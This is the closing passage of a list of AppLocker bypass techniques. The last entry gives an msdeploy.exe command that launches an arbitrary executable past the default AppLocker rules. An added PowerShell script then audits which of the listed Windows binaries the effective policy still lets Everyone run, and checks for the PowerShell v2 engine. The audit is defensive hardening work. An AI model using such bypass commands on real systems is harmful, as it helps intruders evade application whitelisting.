* https://twitter.com/bohops/status/980659399495741441

--------------------------------------------------------------------------
57. msdeploy.exe

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\bypass.exe & pause"

* Requires admin: No
* Windows binary: No
* Bypasses AppLocker Default rules: Yes

Notes:
Part of Web Deploy, so it is only present where that is installed:
* https://www.iis.net/downloads/microsoft/web-deploy

* Links:
* https://twitter.com/pabraeken/status/999090532839313408

--------------------------------------------------------------------------
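Many entries above are marked "Bypasses AppLocker Default rules: ?". The quickest way to resolve that for your own environment is to ask the effective policy directly. The script below is an added example, not code from this list or from @api0cradle: it collects the Windows-native binaries named in the sections above at their usual Windows 10 locations (paths are assumptions; anything missing on the host is skipped), evaluates each with Test-AppLockerPolicy as Everyone, and checks whether the PowerShell v2 engine that sections 42 and 43 depend on is still installed.

```powershell
# Added example; not code from the original list or from @api0cradle.
# Asks the effective AppLocker policy which listed native binaries Everyone may
# still run, and whether the v2 PowerShell engine is present. Paths are the
# usual Windows 10 locations (assumption); missing files are skipped.

$sys32 = Join-Path $env:windir 'System32'
$native = @(
    'rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'cmd.exe', 'cscript.exe', 'wscript.exe',
    'control.exe', 'msiexec.exe', 'cmstp.exe', 'xwizard.exe', 'odbcconf.exe', 'AtBroker.exe',
    'forfiles.exe', 'SyncAppvPublishingServer.exe', 'InfDefaultInstall.exe', 'msdt.exe',
    'PresentationHost.exe', 'ie4uinit.exe', 'mavinject.exe', 'wbem\WMIC.exe',
    'WindowsPowerShell\v1.0\powershell.exe'
) | ForEach-Object { Join-Path $sys32 $_ }

# The .NET tooling (sections 3, 4, 5, 7, 14, 15) exists once per installed CLR
# version and bitness, so collect every copy under %WINDIR%\Microsoft.NET.
$dotnetNames = 'MSBuild.exe', 'RegSvcs.exe', 'RegAsm.exe', 'InstallUtil.exe', 'dfsvc.exe', 'IEExec.exe'
$native += Get-ChildItem -Path (Join-Path $env:windir 'Microsoft.NET') -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $dotnetNames -contains $_.Name } |
    Select-Object -ExpandProperty FullName

function Test-ListedLolbins {
    param(
        [Parameter(Mandatory)] [string[]] $Path,
        [string] $User = 'Everyone'   # evaluate as the least-privileged principal
    )
    $present = @($Path | Where-Object { Test-Path -LiteralPath $_ } | Sort-Object -Unique)
    if ($present.Count -eq 0) { return @() }
    Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path $present -User $User |
        Select-Object FilePath, PolicyDecision, MatchingRule
}

function Test-PowerShellV2Engine {
    # powershell.exe -Version 2 fails with a ".NET Framework 2.0 not installed"
    # error when the engine is absent; when present it reports major version 2.
    $exe   = Join-Path $sys32 'WindowsPowerShell\v1.0\powershell.exe'
    $major = & $exe -NoProfile -NonInteractive -Version 2 -Command '$PSVersionTable.PSVersion.Major' 2>$null
    return (([string]$major).Trim() -eq '2')
}

$results = @(Test-ListedLolbins -Path $native)
$results | Sort-Object PolicyDecision, FilePath | Format-Table -AutoSize

# "Allowed" and "AllowedByDefault" (no rule in that collection) both mean it runs.
$allowed = @($results | Where-Object { $_.PolicyDecision -like 'Allowed*' })
'{0} of {1} listed native binaries are executable by Everyone under the effective policy' -f $allowed.Count, $results.Count

if (Test-PowerShellV2Engine) {
    'PowerShell v2 engine is installed: the -version 2 downgrade (section 42) and CL_Invocation.ps1 (section 43) apply'
}
```

Run it from a standard user session on a machine where the policy is applied (Get-AppLockerPolicy -Effective throws otherwise). Every "Allowed" row is a candidate for a deny rule; the default rule set has none, which is the point this list makes. If the v2 check reports the engine present, disabling the MicrosoftWindowsPowerShellV2 optional feature removes sections 42 and 43 in one step.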